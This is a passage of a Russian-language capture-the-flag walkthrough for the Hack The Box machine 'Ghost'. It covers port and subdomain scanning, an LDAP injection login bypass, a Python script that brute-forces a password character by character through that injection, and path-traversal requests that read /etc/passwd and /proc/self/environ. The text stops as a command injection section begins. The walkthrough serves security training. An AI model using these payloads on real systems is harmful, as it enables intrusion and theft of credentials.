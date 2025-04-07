В этот раз мы прой­дем путь от LDAP Injection и LFI до Command Injection в веб‑при­ложе­нии. Зах­ватив Linux-машину в домене, получим поль­зователь­ский тикет Kerberos и про­ведем DNS Spoofing. Пос­ле получе­ния еще одной домен­ной учет­ки ском­про­мети­руем учет­ную запись служ­бы ADFS и с помощью тех­ники Golden SAML сде­лаем токен для дос­тупа к сай­ту от име­ни адми­на.

Че­рез свя­зан­ные сер­веры Microsoft SQL получим сес­сию от име­ни служ­бы, а затем под­нимем при­виле­гии на кон­трол­лере дочер­него домена. Через Inter-realm golden ticket ском­про­мети­руем кон­трол­лер домена все­го леса.

На­ша цель — получе­ние прав супер­поль­зовате­ля на машине Ghost с учеб­ной пло­щад­ки Hack The Box. Уро­вень слож­ности задания — «безум­ный».

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся с при­мене­нием средств ано­ними­зации и вир­туали­зации. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

До­бав­ляем IP-адрес машины в / etc/ hosts :

10. 10. 11. 24 ghost. htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та: #!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr ' ' ', ' | sed s/, $/ / ) nmap -p $ports -A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

Ска­нер нашел 19 откры­тых пор­тов:

53 — DNS;

80 (HTTP) — веб‑сер­вер Microsoft;

88 — Kerberos;

135 — служ­ба уда­лен­ного вызова про­цедур (Microsoft RPC). Исполь­зует­ся для опе­раций вза­имо­дей­ствия кон­трол­лер — кон­трол­лер и кон­трол­лер — кли­ент;

139 — служ­ба сеан­сов NetBIOS, NetLogon;

389 — LDAP;

443 (HTTPS) — веб‑сер­вер Microsoft IIS/10.0;

445 — SMB;

464 — служ­ба сме­ны пароля Kerberos;

593 (HTTP-RPC-EPMAP) — исполь­зует­ся в служ­бах DCOM и MS Exchange;

636 — LDAP с шиф­ровани­ем SSL или TLS;

1433 — СУБД Microsoft SQL;

3268 (LDAP) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру;

3269 (LDAPS) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру через защищен­ное соеди­нение;

3389 — служ­ба уда­лен­ного рабоче­го сто­ла;

5985 — служ­ба уда­лен­ного управле­ния WinRM;

пор­ты 8008 и 8443 — веб‑сер­вер Nginx 1.18.0;

9389 — веб‑служ­бы AD DS.

Сер­тификат веб‑сер­виса на пор­те 8443 рас­кры­вает новый под­домен, который добавим в файл / etc/ hosts .

10. 10. 11. 24 ghost. htb core. ghost. htb

Ес­ли перей­ти к логину через ADFS, получим редирект на новый под­домен.

До­бав­ляем новый под­домен в / etc/ hosts .

10. 10. 11. 24 ghost. htb core. ghost. htb federation. ghost. htb

На пор­те 8008 нас встре­тит какой‑то блог.

Точка входа

Так как уже было най­дено нес­коль­ко под­доменов, методом перебо­ра поп­робу­ем най­ти еще. Для ска­ниро­вания под­доменов мож­но исполь­зовать ffuf.

Справка: сканирование веба c ffuf Од­но из пер­вых дей­ствий при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов, что­бы най­ти скры­тую информа­цию и недос­тупные обыч­ным посети­телям фун­кции. Для это­го мож­но исполь­зовать прог­раммы вро­де dirsearch и DIRB. Я пред­почитаю лег­кий и очень быс­трый ffuf. При запус­ке ука­зыва­ем сле­дующие парамет­ры: -w — сло­варь (я исполь­зую сло­вари из набора SecLists);

— сло­варь (я исполь­зую сло­вари из набора SecLists); -t — количес­тво потоков;

— количес­тво потоков; -u — URL;

— URL; -H — HTTP-заголо­вок;

— HTTP-заголо­вок; -fs — филь­тро­вать стра­ницы по раз­меру. Мес­то перебо­ра помеча­ется сло­вом FUZZ.

За­даем все парамет­ры и запус­каем:

ffuf -u http:/ / ghost. htb: 8008 -H 'Host: FUZZ. ghost. htb: 8008' -w dns- lists. txt -t 128 -fs 7676

На­ходим еще два домена, которые добав­ляем в / etc/ hosts .

10. 10. 11. 24 ghost. htb core. ghost. htb federation. ghost. htb gitea. ghost. htb intranet. ghost. htb

На пер­вом нас встре­чает Gitea, а на вто­ром — стра­ница авто­риза­ции.

Ес­ли прос­мотреть зап­рос на логин через Burp History, наз­вания парамет­ров дадут понять, что исполь­зует­ся LDAP-аутен­тифика­ция.

LDAP Injection

Пер­вым делом про­верим инъ­екцию LDAP, для чего вмес­то логина и пароля переда­дим сим­вол * , который будет вос­при­нят как «любое количес­тво любых сим­волов». При срав­нении с пер­выми же учет­ными дан­ными из базы на сто­роне сер­вера аутен­тифика­ция будет прой­дена.

Пов­торим вход через бра­узер и прос­мотрим, что есть инте­рес­ного на сай­те.

На стра­нице Users получа­ем спи­сок всех поль­зовате­лей.

На стра­нице Forum находим инте­рес­ную информа­цию. У поль­зовате­ля недос­тупен сер­вис bitbucket. ghost. htb , так как для него отсутс­тву­ет запись DNS. Вер­немся к это­му, как толь­ко получим воз­можность соз­давать записи на DNS-сер­вере.

Так как на сай­те есть LDAP-инъ­екция, мы можем попытать­ся посим­воль­но подоб­рать пароли поль­зовате­лей. Для пер­вого сим­вола будем под­бирать вари­анты a*, b*, c* и так далее. Успешный логон озна­чает вер­но подоб­ранный пароль. Авто­мати­зиро­вать под­бор мож­но сле­дующим скрип­том, а под­бирать будем пароль для учет­ной записи gitea_temp_principal .

import string import requests url = ' http:// intranet. ghost. htb: 8008/ login ' headers = { ' Next-Action ' : ' c471eb076ccac91d6f828b671795550fd5925940 ' } username = " gitea_temp_principal " password = "" while True : for char in string . ascii_lowercase + string . digits : files = { ' 1_ldap-username ' : ( None , username ) , ' 1_ldap-secret ' : ( None , f ' { password } { char } * ' ) , ' 0 ' : ( None , ' [{} , " $K1 " ] ' ) } res = requests . post ( url , headers = headers , files = files ) if res . status_code == 303 : password += char print ( password ) break else : break print ( ) print ( f " Creds => { username } : { password } " )

Па­роль успешно подоб­ран, с получен­ными учет­ными дан­ными залоги­ним­ся в Gitea.

Точка опоры

LFI

Прос­мотрим про­екты, начиная с репози­тория blog . В README написа­но про фун­кцию ска­ниро­вания, которая находит­ся в ста­дии раз­работ­ки, поэто­му дос­тупна толь­ко с клю­чом DEV_INTRANET_KEY , который хра­нит­ся в перемен­ной сре­ды. Для дос­тупа к API бло­га нуж­но исполь­зовать токен a5af628828958c976a3b6cc81a .

Прос­мотрим исходный код posts-public. js . Там инте­ресен эндпо­инт posts , который в катало­ге / var/ lib/ ghost/ extra/ чита­ет файл, передан­ный в парамет­ре extra . При этом никакой филь­тра­ции наз­вания фай­ла нет, так что тут прос­матри­вает­ся потен­циаль­ная уяз­вимость LFI.

Ин­форма­цию об API уда­лось най­ти в офи­циаль­ной справ­ке CMS Ghost.

Про­верим, обра­баты­вает­ся ли URL http:// ghost. htb: 8008/ ghost/ api/ content/ на сер­вере.

Те­перь перебе­рем эндпо­инты с помощью ска­нера feroxbuster.

При запус­ке ука­жем сле­дующие парамет­ры:

-u — URL;

— URL; -w — сло­варь (я исполь­зую сло­вари из набора SecLists);

— сло­варь (я исполь­зую сло­вари из набора SecLists); -d — глу­бина ска­ниро­вания;

— глу­бина ска­ниро­вания; -t — количес­тво потоков.

feroxbuster -u http:/ / ghost. htb: 8008/ ghost/ api/ content/ -w directory_ 2. 3_ medium_ lowercase. txt -d 1 -t 128

В спис­ке есть нуж­ный нам posts . В зап­росе к это­му API переда­ем токен, а так­же путь к фай­лу / etc/ passwd с обхо­дом катало­гов.

http:/ / ghost. htb: 8008/ ghost/ api/ content/ posts/ ? key=a5af628828958c976a3b6cc81a& extra=../../../../../../../.. / etc/ passwd

В отве­те сер­вера получа­ем содер­жимое зап­рошен­ного фай­ла, а зна­чит, уяз­вимость LFI при­сутс­тву­ет. Получим перемен­ные окру­жения, сре­ди которых дол­жен быть и DEV_INTRANET_KEY .

http:/ / ghost. htb: 8008/ ghost/ api/ content/ posts/ ? key=a5af628828958c976a3b6cc81a& extra=../../../../../../../.. / proc/ self/ environ

Пе­рей­дем ко вто­рому сер­вису.

Command Injection

В исходном коде сер­виса сра­зу най­дем все мес­та, где исполь­зует­ся ключ дос­тупа. Ключ нуж­но переда­вать в соот­ветс­тву­ющем заголов­ке.